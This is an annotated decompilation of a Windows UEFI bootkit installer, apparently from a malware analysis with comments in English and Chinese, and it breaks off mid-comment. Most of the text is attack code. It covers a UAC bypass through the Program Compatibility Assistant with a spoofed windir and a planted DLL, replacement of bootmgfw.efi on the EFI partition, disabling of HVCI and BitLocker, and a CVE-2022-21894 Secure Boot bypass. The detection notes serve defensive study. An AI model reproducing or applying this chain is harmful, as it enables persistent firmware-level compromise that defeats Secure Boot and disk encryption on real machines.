RpcBindingSetOption_14026B0C0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0x167CA437u,
0);// <rpcrt4.RpcBindingSetOption>
RpcBindingSetAuthInfoExW_14026B0D0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(Rpcrt4, 0x82535EAC, 0);// <rpcrt4.RpcBindingSetAuthInfoExW>
RpcBindingFree_14026B0D8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(Rpcrt4, 0x76625EECu, 0);// <rpcrt4.RpcBindingFree>
NdrClientCall2_14026B120 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD))get_proc_address_by_hash(Rpcrt4, 0xE4BA5B8D, 0);// <rpcrt4.NdrClientCall2>
NdrClientCall3_14026B128 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(Rpcrt4, 0xE4BA5B8E, 0);// <rpcrt4.NdrClientCall3>
// bcrypt: symmetric decryption of the embedded payloads (aes_256_cbc_decrypt) and random bytes
BCryptOpenAlgorithmProvider_14026B0F0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
bcrypt,
0xC694168A,
0);// <bcrypt.BCryptOpenAlgorithmProvider>
BCryptSetProperty_14026B0F8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(
bcrypt,
0x2163244Bu,
0);// <bcrypt.BCryptSetProperty>
BCryptGenerateSymmetricKey_14026B100 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0x5CD9DC29u, 0);// BCryptGenerateSymmetricKey
BCryptDecrypt_14026B108 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _QWORD, _DWORD, _QWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0xC604BB01, 0);// BCryptDecrypt
BCryptDestroyKey_14026B110 = (__int64 (*)(void))get_proc_address_by_hash(bcrypt, 0xB241FED1, 0);// <bcrypt.BCryptDestroyKey>
BCryptCloseAlgorithmProvider_14026B118 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
bcrypt,
0x1ACC1354u,
0);// <bcrypt.BCryptCloseAlgorithmProvider>
BCryptGetProperty_14026B180 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD))get_proc_address_by_hash(bcrypt, 0x5239823Fu, 0);// <bcrypt.BCryptGetProperty>
BCryptGenRandom_14026B1A0 = (__int64)get_proc_address_by_hash(bcrypt, 0x3EC63647u, 0);// <bcrypt.BCryptGenRandom>
// ole32/combase: COM initialisation and proxy security settings
CoCreateInstance_14026B148 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
ole32,
0xF02EBA3D,
0);// <combase.CoCreateInstance>
CoInitializeEx_14026B150 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(ole32, 0x7AC5A5AFu, 0);// <combase.CoInitializeEx>
CoUninitialize_14026B158 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(ole32, 0x1F8B8AF5u, 0);// <combase.CoUninitialize>
CoInitializeSecurity_14026B1D0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _DWORD, _QWORD))get_proc_address_by_hash(ole32, 0xA681A8DC, 0);// <combase.CoInitializeSecurity>
CoSetProxyBlanket_14026B1D8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _DWORD))get_proc_address_by_hash(ole32, 0x66DF13EBu, 0);// <combase.CoSetProxyBlanket>
// stru_7FFE0000 is KUSER_SHARED_DATA; 10*major+minor encodes the OS version, 61 == 6.1
if ( stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion > 61 )// >win7/server 2008 r2
{
// cabinet: LZMS decompression of the embedded boot binaries (decompress_crypted_lzms)
CreateDecompressor_14026B188 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Cabinet,
0xF1657E42,
0);// <cabinet.CreateDecompressor>
CloseDecompressor_14026B198 = (__int64 (*)(void))get_proc_address_by_hash(Cabinet, 0xA405939E, 0);// <cabinet.CloseDecompressor>
Decompress_14026B190 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Cabinet,
0x632FDDE3u,
0);// Decompress
}
}
is_at_least_il_high
// SECURITY_MANDATORY_HIGH_RID
// Returns TRUE when the current process token's integrity level is High or
// above, i.e. the mandatory-label RID is >= SECURITY_MANDATORY_HIGH_RID
// (0x3000). Queries TokenIntegrityLevel twice: once to learn the buffer
// size, once to fill it, then reads the last sub-authority of the label SID.
BOOL __stdcall is_at_least_il_high()
{
BOOL v0; // ebx
unsigned int v1; // esi -- integrity RID read from the label SID (0 if the query failed)
_QWORD *Heap_14026B010; // rdi -- TOKEN_MANDATORY_LABEL buffer; first field is Label.Sid
_BYTE *v3; // rax -- pointer to the SID's SubAuthorityCount
ULONG v5; // [rsp+40h] [rbp+8h] BYREF -- required / returned length
HANDLE Handle; // [rsp+48h] [rbp+10h] BYREF
v0 = 0;
v5 = 0;
v1 = 0;
Handle = (HANDLE)0xFFFFFFFFFFFFFFFFi64;
// 0x18 = TOKEN_QUERY | TOKEN_QUERY_SOURCE on the current process (pseudo-handle -1)
if ( NtOpenProcessToken((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x18u, &Handle) >= 0 )
{
// Size probe; the status (expected STATUS_BUFFER_TOO_SMALL) is not checked,
// so a failure here leaves v5 == 0 and the allocation below gets size 0.
NtQueryInformationToken(Handle, TokenIntegrityLevel, 0i64, 0, &v5);
Heap_14026B010 = (_QWORD *)RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v5);// 8 = HEAP_ZERO_MEMORY
if ( Heap_14026B010 )
{
if ( NtQueryInformationToken(Handle, TokenIntegrityLevel, Heap_14026B010, v5, &v5) >= 0 )
{
// The integrity RID is the SID's last sub-authority (index SubAuthorityCount - 1).
v3 = (_BYTE *)RtlSubAuthorityCountSid_14026B178(*Heap_14026B010);
v1 = *(_DWORD *)RtlSubAuthoritySid_14026B170(*Heap_14026B010, (unsigned __int8)(*v3 - 1));
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
}
}
// Handle was initialised to -1, which this test does not exclude, so on the
// NtOpenProcessToken failure path NtClose(-1) is attempted (harmless).
if ( Handle )
NtClose(Handle);
LOBYTE(v0) = v1 >= (unsigned int)SECURITY_MANDATORY_HIGH_RID;
return v0;
}
do_uac_bypass
// Entry point of the non-elevated path. Obtains the current user's SID
// (get_sid_of_user), checks whether it already occurs in the process command
// line (wcscmp_s; the installer appears to relaunch itself with the SID as
// an argument, see uacbypass_main_140004964), and dispatches on the OS
// version encoded as 10*major+minor (61 == Windows 7 / Server 2008 R2):
//  - versions below 6.1 are not handled (SID freed, return);
//  - on 6.1 the "other" instance just sleeps 2.5 s and exits;
//  - on newer versions the "other" instance calls trigger_pca_uac_bypass_maybe
//    (which writes ETW events and terminates the process);
//  - the instance for which v4 == 0 runs uacbypass_main_140004964.
// The exact meaning of wcscmp_s's return value is not visible here; only
// that 0 selects the uacbypass_main path. Returns user_isnot_admin()'s result
// when no SID could be obtained, otherwise the RtlFreeHeap status.
__int64 do_uac_bypass()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ProcessParameters = NtCurrentPeb()->ProcessParameters;
CommandLine = ProcessParameters->CommandLine;
ImagePathName = ProcessParameters->ImagePathName;
sid_of_user = (WCHAR *)get_sid_of_user();
result = user_isnot_admin();
if ( sid_of_user )
{
if ( (_DWORD)result ) // nonzero presumably means "not a local administrator"
{
v3 = wcslen_1400058DC(sid_of_user);
// Does the SID string already appear in the command line? (relaunched instance)
v4 = wcscmp_s(sid_of_user, v3, CommandLine.Buffer, CommandLine.Length >> 1);
v5 = stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion;
if ( v5 == 61 ) // win7
{
if ( v4 )
{
Sleep_14026B0E8(0x9C4i64); // 2500 ms
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
isWin7 = 1;
}
else
{
if ( v5 <= 61 ) // pre-Vista/Win7 versions: nothing to do
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
if ( v4 ) // do BiTriggerMain
{
trigger_pca_uac_bypass_maybe(); // writes two ETW events, then terminates this process
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
isWin7 = 0;
}
uacbypass_main_140004964(isWin7, &ImagePathName, sid_of_user);
}
return RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, sid_of_user);
}
return result;
}
// Writes two events through EtwEventWriteNoRegistration and then terminates
// the current process. The EVENT_DATA_DESCRIPTOR named AE_LOG is not used as
// a data descriptor: its Ptr/Size/Reserved fields are filled with 16 raw
// bytes that form the provider GUID passed as the first argument. The
// analyst's naming (AE_*, "pca") suggests the Application-Experience /
// Program Compatibility Assistant provider; the GUID is not decoded here.
// The user-data array is three contiguous descriptors on the stack: the
// named AE_EVENT_DESCRIPTOR plus v5/v6 and v7/v8 (see the rbp offsets),
// carrying a 4-byte zero (v9), the same 4-byte zero again, and an empty
// entry. Event id 0x1F46 is written first, then 0x1F48, both with level 4
// and keyword 0x4000000000000100.
// Returns the first write's status when it fails; otherwise calls
// NtTerminateProcess with exit code 0 (second write ok) or 0xFFFFFFFF.
NTSTATUS trigger_pca_uac_bypass_maybe()
{
NTSTATUS result; // eax
NTSTATUS v1; // edx -- exit code handed to NtTerminateProcess
EVENT_DATA_DESCRIPTOR AE_LOG; // [rsp+20h] [rbp-50h] BYREF -- actually the 16-byte provider GUID
EVENT_DESCRIPTOR MessageBoxEvent; // [rsp+30h] [rbp-40h] BYREF
EVENT_DATA_DESCRIPTOR AE_EVENT_DESCRIPTOR; // [rsp+40h] [rbp-30h] BYREF -- user data [0]
int *v5; // [rsp+50h] [rbp-20h] -- user data [1].Ptr
__int64 v6; // [rsp+58h] [rbp-18h] -- user data [1].Size
__int64 v7; // [rsp+60h] [rbp-10h] -- user data [2].Ptr
__int64 v8; // [rsp+68h] [rbp-8h] -- user data [2].Size
int v9; // [rsp+80h] [rbp+10h] BYREF -- the 4-byte zero payload
*(_QWORD *)&AE_EVENT_DESCRIPTOR.Size = 4i64;
v9 = 0;
AE_EVENT_DESCRIPTOR.Ptr = (ULONGLONG)&v9;
v6 = 4i64;
v5 = &v9;
v7 = 0i64;
v8 = 0i64;
*(_DWORD *)&MessageBoxEvent.Id = 0x11001F46; // Id 0x1F46, Version 0, Channel 0x11
MessageBoxEvent.Keyword = 0x4000000000000100i64;
*(_DWORD *)&MessageBoxEvent.Level = 4;
// Provider GUID bytes, stored across the three descriptor fields.
AE_LOG.Ptr = 0x422D0661EEF54E71i64;
AE_LOG.Size = 0xFD82989A;
AE_LOG.Reserved = 0x20B84049;
result = ((__int64 (__fastcall *)(EVENT_DATA_DESCRIPTOR *, EVENT_DESCRIPTOR *, __int64, EVENT_DATA_DESCRIPTOR *))EtwEventWriteNoRegistration_14026B0E0)(
&AE_LOG,
&MessageBoxEvent,
3i64,
&AE_EVENT_DESCRIPTOR);
if ( !result )
{
MessageBoxEvent.Id = 0x1F48; // second event, same provider and payload
if ( (unsigned int)((__int64 (__fastcall *)(EVENT_DATA_DESCRIPTOR *, EVENT_DESCRIPTOR *, __int64, EVENT_DATA_DESCRIPTOR *))EtwEventWriteNoRegistration_14026B0E0)(
&AE_LOG,
&MessageBoxEvent,
3i64,
&AE_EVENT_DESCRIPTOR) )
v1 = 0xFFFFFFFF;
else
v1 = 0;
return NtTerminateProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, v1);
}
return result;
}
// Core of the UAC-bypass path, reached from do_uac_bypass. Host artefacts
// produced by the code below, useful for detection and clean-up:
//  - a hidden "system32" directory created next to the installer image
//    (Destination = "\??\" + image directory + "system32") holding the
//    AES-decrypted pcadm.dll;
//  - a notification event named "\BaseNamedObjects\<username>";
//  - HKCU\Environment renamed to the user's SID string, a REG_SZ "windir"
//    value pointing at the image directory and a value named after the user
//    holding the image path, then the key renamed back to "Environment";
//  - PcaSvc started and the WDI task stopped (per the analyst's names), the
//    installer spawned again in a suspended state (create_proc_1400066A0)
//    and driven through the PCA RPC interface: NdrClientCall2 on Windows 7,
//    NdrClientCall3 otherwise, with a 20 s wait on the event afterwards.
// On every exit path the dropped DLL is deleted, the registry change is
// reverted (delreg_14000529C), the child process is terminated and the RPC
// binding, heap buffer and COM are released.
// Returns the status of the final do_appcompat_registry_stuff call.
NTSTATUS __fastcall uacbypass_main_140004964(int isWin7, PUNICODE_STRING imagepath, WCHAR *sid)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v49 = 0x100; // capacity passed to GetUserNameW (wide chars)
v5 = 0; // set when pcadm.dll was written, so it is deleted on exit
pProxyInfo = 0i64;
v6 = 0i64; // decrypted DLL image (heap)
v35 = 0;
v7 = 0i64; // RPC binding to free on exit
EventHandle = 0i64;
FileHandle = 0i64;
regkey_hkcu = 0i64;
v38 = 0i64;
*(_OWORD *)Handle = 0i64; // Handle[0] = process, Handle[1] = thread of the spawned child
memset_140001000(Count, 0, sizeof(Count));
memset_140001000(Source, 0, sizeof(Source));
memset_140001000(Destination, 0, sizeof(Destination));
Buffer = imagepath->Buffer;
Timeout.QuadPart = 0xFFFFFFFFF4143E00ui64; // relative -200,000,000 * 100 ns = 20 seconds
do_appcompat_registry_stuff(isWin7, Buffer);
wcsncpy_path(Count, imagepath->Buffer, imagepath->Length >> 1); // Count = directory part of the image path (assumed from the name)
v11 = CoInitializeEx_14026B150(0i64, 0xEi64);
if ( v11 >= 0
&& (unsigned int)Start_Service_PcaSvc_1400048A4()
&& (unsigned int)BiStopWdiTask_140004494()
&& (unsigned int)GetUserNameW_14026B090(Source, &v49) )
{
// \??\
v12 = deobfuscate_wstring(path_prefix_14000AA98, 5u, 1);
// Inlined bounded wide-string copy (decompiled wcsncpy, 0x118 chars) of "\??\" into Destination.
v13 = Destination;
v14 = (char *)v12 - (char *)Destination;
v15 = 0x118i64;
do
{
if ( v15 == 0xFFFFFFFF8000011Aui64 )
break;
v16 = *(wchar_t *)((char *)v13 + v14);
if ( !v16 )
break;
*v13++ = v16;
--v15;
}
while ( v15 );
v17 = v13 + 0xFFFFFFFF;
if ( v15 )
v17 = v13;
*v17 = 0;
wcsncat(Destination, 0x118ui64, Count); // Destination = \??\<image dir>
// system32
v18 = deobfuscate_wstring(ws, 9u, 1);
wcsncat(Destination, 280ui64, v18); // Destination = \??\<image dir>system32
// \BaseNamedObjects\
v19 = deobfuscate_wstring(word_14000AAC0, 0x13u, 1);
// Same inlined copy pattern (0x122 chars) into v47.
v20 = v47;
v21 = (char *)v19 - (char *)v47;
v22 = 0x122i64;
do
{
if ( v22 == 0xFFFFFFFF80000124ui64 )
break;
v23 = *(wchar_t *)((char *)v20 + v21);
if ( !v23 )
break;
*v20++ = v23;
--v22;
}
while ( v22 );
v24 = v20 + 0xFFFFFFFF;
if ( v22 )
v24 = v20;
*v24 = 0;
wcsncat(v47, 0x122ui64, (const wchar_t *)Source); // v47 = \BaseNamedObjects\<username>
RtlInitUnicodeString_14026B000(&NewName, v47);
v41.Length = 0x30;
v41.RootDirectory = 0i64;
v41.Attributes = 0;
v41.ObjectName = &NewName;
*(_OWORD *)&v41.SecurityDescriptor = 0i64;
// 0x1F0003 = EVENT_ALL_ACCESS; the event is later waited on with the 20 s timeout.
if ( NtCreateEvent(&EventHandle, 0x1F0003u, &v41, NotificationEvent, 0) >= 0 )
{
RtlInitUnicodeString_14026B000(&NewName, Destination);
ObjectAttributes.Length = 0x30;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 0x40; // OBJ_CASE_INSENSITIVE
ObjectAttributes.ObjectName = &NewName;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
// Create/open the fake system32 directory: 0x120116 = FILE_GENERIC_WRITE,
// attributes 2 = FILE_ATTRIBUTE_HIDDEN, share 1 = FILE_SHARE_READ,
// disposition 3 = FILE_OPEN_IF, options 1 = FILE_DIRECTORY_FILE.
if ( NtCreateFile(&FileHandle, 0x120116u, &ObjectAttributes, &IoStatusBlock, 0i64, 2u, 1u, 3u, 1u, 0i64, 0) >= 0 )
{
// \pcadm.dll
v25 = deobfuscate_wstring(word_14000AAE8, 0xBu, 1);
wcsncat(Destination, 0x118ui64, v25); // Destination = \??\<image dir>system32\pcadm.dll
// ixdlYf9TqA9VH5oLoD3ltBeGjKRhM8pu
v26 = deobfuscate_bytes(a1, 0x21u, 1); // AES key material for the embedded DLL
v27 = aes_256_cbc_decrypt(pbInput, v26, 5136u, &pcbOutput);
v6 = v27;
if ( v27 )
{
if ( pcbOutput )
{
v5 = write_file(Destination, v27, pcbOutput); // drop pcadm.dll
if ( v5 )
{
Count[(unsigned int)wcslen_1400058DC(Count) - 1] = 0; // strip the trailing separator from the image directory
// \Environment
v28 = deobfuscate_wstring(word_14000AB28, 0xDu, 1);
// bypass Windows Defender filter driver catching custom windir creation
regkey_hkcu = create_regkey_hkcu(v28);
if ( regkey_hkcu )
{
// Temporarily rename HKCU\Environment to the SID string while the values are written.
RtlInitUnicodeString_14026B000(&NewName, sid);
if ( NtRenameKey(regkey_hkcu, &NewName) >= 0 )
{
// windir
v29 = deobfuscate_wstring(ws_windir_14000AA68, 7u, 1);
RtlInitUnicodeString_14026B000(&NewName, v29);
v30 = wcslen_1400058DC(Count);
// Type 1 = REG_SZ; "windir" now points at the directory holding the fake system32.
if ( NtSetValueKey(regkey_hkcu, &NewName, 0, 1u, Count, 2 * v30) >= 0 )
{
RtlInitUnicodeString_14026B000(&NewName, Source);
// A second REG_SZ value, named after the user, holds the full image path.
if ( NtSetValueKey(regkey_hkcu, &NewName, 0, 1u, imagepath->Buffer, imagepath->Length) >= 0 )
{
// Environment
v31 = deobfuscate_wstring(ws_Environment_14000AA78, 0xCu, 1);
RtlInitUnicodeString_14026B000(&NewName, v31);
if ( NtRenameKey(regkey_hkcu, &NewName) >= 0 ) // rename the key back
{
// Relaunch the installer (suspended, per the NtResumeThread calls below) with the SID as argument.
if ( (unsigned int)create_proc_1400066A0(
(__int64)imagepath->Buffer,
(__int64)sid,
(__int64)Handle,
1) )
{
if ( (unsigned int)BiCreatePcaRpcBinding(&pProxyInfo) )
{
if ( isWin7 )
{
NtResumeThread(Handle[1], 0i64);
v7 = pProxyInfo;
if ( (unsigned int)NdrClientCall2_1400043D4(
(__int64)pProxyInfo,
(__int64)imagepath->Buffer,
1,
v38) )
goto LABEL_36;
}
else
{
v7 = pProxyInfo;
if ( (unsigned int)NdrClientCall3_140004404(
(_DWORD)pProxyInfo,
Handle[0],
1,
imagepath->Buffer,
(__int64)sid,
(__int64)Count,
0) )
goto LABEL_36;
NtResumeThread(Handle[1], 0i64);
NtWaitForSingleObject(Handle[0], 0, 0i64); // wait for the child to exit
GetExitCodeProcess_14026B130(Handle[0], &v35);
}
NtWaitForSingleObject(EventHandle, 0, &Timeout); // up to 20 s for the named event
}
else
{
v7 = pProxyInfo;
}
}
}
}
}
}
}
}
}
}
}
}
}
LABEL_36:
// Common cleanup: every artefact created above is removed here.
BiStopWdiTask_140004494();
if ( EventHandle )
NtClose(EventHandle);
if ( FileHandle )
NtClose(FileHandle);
if ( v5 )
delfile_140005360(Destination); // remove the dropped pcadm.dll
if ( regkey_hkcu )
delreg_14000529C((__int64)sid, (__int64)Source, regkey_hkcu); // undo the Environment key changes
if ( Handle[0] )
{
NtTerminateProcess(Handle[0], 0xFFFFFFFF); // kill the spawned child if still running
CloseHandle_14026B070(Handle[0]);
}
if ( Handle[1] )
CloseHandle_14026B070(Handle[1]);
if ( v7 )
RpcBindingFree_14026B0D8(v7);
if ( v6 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v6);
if ( v11 >= 0 )
CoUninitialize_14026B158((unsigned int)v11);
return do_appcompat_registry_stuff(isWin7, imagepath->Buffer);
}
install_bootkit_main
// Elevated path: determines the Secure Boot state and installs the bootkit.
//  1. creates a window that registers a shutdown-block reason so the machine
//     is not rebooted mid-install;
//  2. acquires SeSystemEnvironmentPrivilege and reads the UEFI variable
//     "SecureBoot" under EFI_GLOBAL_VARIABLE (the GUID assembled in v9,
//     {8BE4DF61-93CA-11D2-AA0D-00E098032B8C});
//  3. treats Secure Boot as off when the variable is 0, when it is 1 on a
//     6.1 or older OS, or when it does not exist (0xC0000100 =
//     STATUS_VARIABLE_NOT_FOUND); any other failure skips installation;
//  4. calls install_bootkit(Secure_Boot);
//  5. schedules deletion of its own image at next boot via
//     MoveFileExW(..., NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
//  6. on success acquires another privilege (a 0x14-char name, presumably
//     SeShutdownPrivilege), sleeps 60 s and reboots (NtShutdownSystem(1) ==
//     ShutdownReboot).
// Returns the last status produced (MoveFileExW / shutdown-block / privilege
// / NtShutdownSystem).
__int64 install_bootkit_main()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v11 = 0; // receives the 1-byte SecureBoot variable value
v0 = 0; // install_bootkit result
ProcessParameters = NtCurrentPeb()->ProcessParameters;
// EFI_GLOBAL_VARIABLE vendor GUID, written field by field.
v9.Data1 = 0x8BE4DF61;
*(_DWORD *)&v9.Data2 = 0x11D293CA;
*(_DWORD *)v9.Data4 = 0xE0000DAA;
*(_DWORD *)&v9.Data4[4] = 0x8C2B0398;
v12 = 4; // size of the value buffer passed to NtQuerySystemEnvironmentValueEx
shutdown_prevention_window = create_shutdown_prevention_window();
// SeSystemEnvironmentPrivilege
SeSystemEnvironmentPrivilege = deobfuscate_wstring(word_14000A270, 0x1Du, 1);
if ( (unsigned int)obtain_privilege(SeSystemEnvironmentPrivilege) )
{
// SecureBoot
v4 = deobfuscate_wstring(word_14000A2B0, 0xBu, 1);
RtlInitUnicodeString_14026B000(&v10, v4);
v5 = NtQuerySystemEnvironmentValueEx(&v10, &v9, &v11, &v12, 0i64);
// Secure Boot considered off: value 0, value 1 on <= 6.1, or variable absent.
if ( v5 >= 0 && (!v11 || v11 == 1 && stru_7FFE0000.NtMinorVersion + 0xA * stru_7FFE0000.NtMajorVersion <= 61)
|| v5 == 0xC0000100 )
{
Secure_Boot = 0;
}
else
{
if ( v5 < 0 ) // any other query error: do not install
goto LABEL_11;
Secure_Boot = 1;
}
v0 = install_bootkit(Secure_Boot);
}
LABEL_11:
result = MoveFileExW_14026B138(ProcessParameters->ImagePathName.Buffer, 0i64, MOVEFILE_DELAY_UNTIL_REBOOT);// self-delete on reboot
if ( shutdown_prevention_window )
result = shutdown_blockreason_140005A6C(shutdown_prevention_window); // lift the shutdown block
if ( v0 )
{
v8 = deobfuscate_wstring(word_14000A2C8, 0x14u, 1); // privilege name, presumably SeShutdownPrivilege
result = obtain_privilege(v8);
if ( (_DWORD)result )
{
Sleep_14026B0E8(0xEA60i64); // 60 000 ms
return NtShutdownSystem(1i64); // ShutdownReboot
}
}
return result;
}
install_bootkit
esp \EFI\Microsoft\Boot\bootmgfw.efi-->重命名为esp \EFI\Microsoft\Boot\winload.efi
如果没有开启Secure_Boot 则直接将bootkit写入esp \EFI\Microsoft\Boot\bootmgfw.efi
当开启Secure_Boot 后,调用write_file_SecureBoot_140002E50,
bootmgfw.efi替换失败则进行恢复
//esp \EFI\Microsoft\Boot\winload.efi-->重命名为esp \EFI\Microsoft\Boot\bootmgfw.efi
// Drops the bootkit onto the EFI System Partition (ESP).
//  1. decrypts the embedded bootkit (AES-256-CBC; key material is an
//     obfuscated 0x21-byte blob);
//  2. builds "<ESP>\EFI\Microsoft\Boot\bootmgfw.efi" (esp_bootmgfw_path) and
//     "<ESP>\EFI\Microsoft\Boot\winload.efi" (esp_winload_efi);
//  3. renames the genuine bootmgfw.efi to winload.efi;
//  4. writes the bootkit as bootmgfw.efi — directly when Secure Boot is off,
//     through write_file_SecureBoot_140002E50 when it is on;
//  5. disables HVCI through the registry and disables BitLocker on all
//     volumes — both run regardless of whether step 4 succeeded;
//  6. if step 4 failed, renames winload.efi back to bootmgfw.efi. The same
//     restore rename is also reached by the earlier failure paths, before any
//     rename took place.
// Returns nonzero on success. Note the decompiler's goto into the body of
// `if ( bootkit )` at LABEL_22: the success path skips the restore rename.
__int64 __fastcall install_bootkit(int is_Secure_Boot)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v2 = 0; // result
bootkit = 0i64;
esp_nt_path = get_esp_nt_path(); // \EFI\Microsoft\Boot\
out_sz = 0;
esp_nt_path1 = esp_nt_path;
if ( esp_nt_path )
{
// By3h2zWrQxPF9ijYLqMl8ojenCInrWZG
v6 = deobfuscate_bytes(byte_14000A208, 0x21u, 1);
bootkit = aes_256_cbc_decrypt(bootkit_14000D420, v6, 84896u, &out_sz);// the embedded bootkit is AES-encrypted
if ( bootkit )
{
if ( out_sz )
{
// Inlined bounded wide-string copy (decompiled wcsncpy, 0x104 chars) of esp_nt_path into esp_bootmgfw_path.
v7 = esp_bootmgfw_path;
v8 = 0x104i64;
do
{
if ( v8 == 0xFFFFFFFF80000106ui64 )
break;
v9 = *(_WORD *)((char *)v7 + (char *)esp_nt_path1 - (char *)esp_bootmgfw_path);
if ( !v9 )
break;
*(_WORD *)v7 = v9;
v7 = (int *)((char *)v7 + 2);
--v8;
}
while ( v8 );
v10 = (int *)((char *)v7 + 0xFFFFFFFE);
if ( v8 )
v10 = v7;
*(_WORD *)v10 = 0;
// bootmgfw.efi
bootmgfw_efi = deobfuscate_wstring(word_14000A230, 0xDu, 1);
wcsncat((wchar_t *)esp_bootmgfw_path, 0x104ui64, bootmgfw_efi);// esp \EFI\Microsoft\Boot\bootmgfw.efi
// Same copy pattern into esp_winload_efi.
v12 = esp_winload_efi;
v13 = 0x104i64;
do
{
if ( v13 == 0xFFFFFFFF80000106ui64 )
break;
v14 = *(wchar_t *)((char *)v12 + (char *)esp_nt_path1 - (char *)esp_winload_efi);
if ( !v14 )
break;
*v12++ = v14;
--v13;
}
while ( v13 );
v15 = v12 + 0xFFFFFFFF;
if ( v13 )
v15 = v12;
*v15 = 0;
// winload.efi
winload_efi_1 = deobfuscate_wstring(word_14000A250, 0xCu, 1);
wcsncat(esp_winload_efi, 0x104ui64, winload_efi_1);// esp \EFI\Microsoft\Boot\winload.efi
if ( (unsigned int)move_file((const WCHAR *)esp_bootmgfw_path, esp_winload_efi) )// rename esp \EFI\Microsoft\Boot\bootmgfw.efi to esp \EFI\Microsoft\Boot\winload.efi
{
// Secure Boot on: go through the shim-based drop; off: overwrite bootmgfw.efi directly.
v17 = is_Secure_Boot ? write_file_SecureBoot_140002E50((const WCHAR *)esp_bootmgfw_path, bootkit, out_sz) : write_file((const WCHAR *)esp_bootmgfw_path, bootkit, out_sz);
v2 = v17;
// Both calls below happen even when the write above failed.
disable_hvci_via_registry_edit();
bitlocker_disable_for_all_volumes();
if ( v2 )
goto LABEL_22;
}
}
}
}
move_file(esp_winload_efi, (const wchar_t *)esp_bootmgfw_path);// restore bootmgfw.efi when the write (incl. write_file_SecureBoot_140002E50) failed
// i.e. rename esp \EFI\Microsoft\Boot\winload.efi back to esp \EFI\Microsoft\Boot\bootmgfw.efi
if ( bootkit )
LABEL_22:
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bootkit);
if ( esp_nt_path1 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, esp_nt_path1);
return v2;
}
write_file_SecureBoot_140002E50
-
bootkit -->写入 esp \EFI\Microsoft\Boot\grubx64.efi
-
首次启动,创建 ESP:/system32/时
- Legitimate Microsoft-signed shim binary写入esp \EFI\Microsoft\Boot\bootload.efi
- official_bootmgfw_data 写入esp \EFI\Microsoft\Boot\bootmgfw.efi
- hvloader_data写入esp \system32\hvloader.efi
- official_bootmgr_data写入esp \system32\bootmgr.efi
- bcd_exp_data写入esp \system32\BCD
- CVE-2022-21894_payload写入 esp \system32\mcupdate_AuthenticAMD.dll
- CVE-2022-21894_payload写入esp \system32\mcupdate_GenuineIntel.dll
- 备份BCD到 esp \EFI\Microsoft\Boot\BCDR
- bcd_setup0_data写入esp \EFI\Microsoft\Boot\tmp,设置为\Registry\Machine\BCD00000000
-
已存在,打开esp \system32\ ,即再次启动此安装程序时
- Legitimate Microsoft-signed shim binary 写入esp \EFI\Microsoft\Boot\bootmgfw.efi,返回
// Secure-Boot variant of the bootkit drop (the analysis above lists the same
// steps). With esp_boot_path = "<ESP>\EFI\Microsoft\Boot\":
//  - writes the bootkit to <Boot>\grubx64.efi;
//  - creates or opens the directory <ESP>\system32\ (esp_system);
//  - unpacks the embedded Microsoft-signed shim (bootload_data);
//  - if <ESP>\system32\ already existed (IoStatusBlock.Information ==
